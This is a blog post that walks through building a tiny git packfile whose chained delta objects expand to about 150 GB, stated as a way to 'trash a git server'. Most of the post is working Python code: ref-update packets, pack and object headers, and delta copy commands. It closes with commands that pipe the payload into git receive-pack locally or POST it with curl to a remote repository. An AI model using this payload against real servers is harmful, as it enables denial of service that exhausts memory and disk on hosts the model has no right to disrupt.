Git delta amplification

Written by verigak | Published 2017/10/30
Tech Story Tags: programming | git | python | git-delta-amplification | git-delta

TLDRvia the TL;DR App

One interesting aspect of the git protocol are the delta objects. They allow to essentially copy-paste stuff from one object to create a new one. Let’s use deltas to create a huge object and try to trash a git server!

The plan

The maximum amount of bytes we can copy paste is 16711680 bytes (255 << 16), so we’ll use a blob of this size and paste it a few thousand times. Just for fun we’ll actually start with a blob of 255 bytes and work our way up.

The git protocol

But first things first, we need to learn the git protocol. The command responsible for receiving objects is receive-pack and the first thing it expects is a list of reference updates. For example:

<OLD_SHA1> <NEW_SHA1> refs/heads/master

We can’t be bothered finding a valid OLD_SHA1, so we’ll sidestep this by creating a new reference instead. We can do this by using the special zero-id hash: 0000000000000000000000000000000000000000. And for NEW_SHA1 we’ll just use a dummy hash, say 1111111111111111111111111111111111111111, since we are hoping the git server to crash before actually trying to verify this hash.

Finally these commands are encoded in the pkt-line format, which adds a 4 byte length hex prefix. So, let’s see what we have so far (I’ll use Python 3 for the code samples).

zero_id = b'0' * 40

fake_id = b'1' * 40

create_ref = b'%s %s refs/heads/xxx\x00\n' % (zero_id, fake_id)

pkt_line = b'%04x%s' % (len(create_ref) + 4, create_ref)

sys.stdout.buffer.write(pkt_line)

sys.stdout.buffer.write(b'0000')

Packs

Next, we need to start packing the objects we are going to send. Let’s start with the header: 12 bytes consisting of: ‘PACK’ in ASCII, followed by a 4 byte version number (always 2) and 4 bytes for the number of objects that are following (all numbers are in network byte order). According to our plan we’ll start with a blob object of size 255, use this to generate a blob of size 65280, use this to generate a blob of size 16711680 and finally our big blob, so 4 objects total. We won’t bother creating any commit objects.

pack = bytearray()

pack += b'PACK' + struct.pack('!II', 2, 4)

Header is ready, let’s add our first blob. Each object inside a pack needs an object header that encodes its type and size. The type numbers we are going to use are: 3 for blobs and 7 for deltas.

Having fixed size fields for that would be too obvious, so git uses its own variable length encoding. Let’s write a function to do this:

def object_header(obj_type, obj_size):

header = bytearray()

b = (obj\_type << 4) | (obj\_size & 15)

obj\_size >>= 4

while obj\_size > 0:

    header.append(b | 0x80)

    b = obj\_size & 0x7f

    obj\_size >>= 7

header.append(b)

return header

We are finally ready to add the first blob!

size0 = 255

blob0 = os.urandom(size0)

pack += object_header(3, size0)

pack += zlib.compress(blob0)

Deltas

We can now create our first delta. We will copy-paste blob0 256 times for a new blob of size 65280. The delta format is pretty straight forward:

SRC_SIZE DST_SIZE [COMMANDS]

Of course the sizes also use variable length encoding, so let’s create a couple helper functions:

def make_delta(src_size, dst_size, commands):

return encode\_size(src\_size) + encode\_size(dst\_size) + commands

def encode_size(n):

b = bytearray()

while n > 0:

    mod = n & 0x7f

    n >>= 7

    if n > 0:

        b.append(0x80 | mod)

    else:

        b.append(mod)

return b

We’ll also need to point to the source object with a 20 byte header of its hash, so let’s add a function to calculate the id of a blob:

def blob_id(blob):

m = hashlib.sha1()

m.update(b'blob %d\\0' % len(blob))

m.update(blob)

return m.digest()

We now have all the building blocks to create our first delta object:

size1 = size0 * 256

cmd1 = bytes([0x80 | 0x10, 0xff]) * 256

delta1 = make_delta(size0, size1, cmd1)

pack += object_header(7, len(delta1))

pack += blob_id(blob0) # source

pack += zlib.compress(delta1)

Let’s talk about the command we created. The first byte defines what kind of operation we are doing. 0x80 means we want to copy from the source object. 0x10 means following byte will say how many bytes to copy. So these 2 bytes essentially translate to: copy 255 bytes. And we do this 256 times.

OK, let’s create our second delta:

size2 = size1 * 256

cmd2 = bytes([0x80 | 0x20, 0xff]) * 256

delta2 = make_delta(size1, size2, cmd2)

pack += object_header(7, len(delta2))

pack += blob_id(blob0 * 256) # source blob

pack += zlib.compress(delta2)

Notice how here we use the command 0x20 which means the following byte will be multiplied by 256 and used as the copy size. So our new command translates to: copy 65280 bytes, 256 times. Also notice that for source id we use the blob that will be generated by delta1.

delta2 is our biggest building block, let’s use it to generate a blob size of about 150 GB.

size3 = size2 * 10000

cmd3 = bytes([0x80 | 0x40, 0xff]) * 10000

delta3 = make_delta(size2, size3, cmd3)

pack += object_header(7, len(delta3))

pack += blob_id(blob0 * 256 * 256) # source blob

pack += zlib.compress(delta3)

Here we use the command 0x40 which multiplies the following byte by 65536, allowing us to create the command: copy 16711680 bytes, 10000 times.

And that’s it, total pack size is 464 bytes to generate about 150 GB. You can run with:

./amplify.py | git receive-pack /path/to/repo.git

Or try it with a remote repo:

./amplify.py | curl -v -X POST — data-binary @- -H ‘Content-Type: application/x-git-receive-pack-request’ https://host/path/repo.git/git-receive-pack

Here is the final source: https://gist.github.com/verigak/bda113dc5850d2cb30c9b3c5f83c8141


Published by HackerNoon on 2017/10/30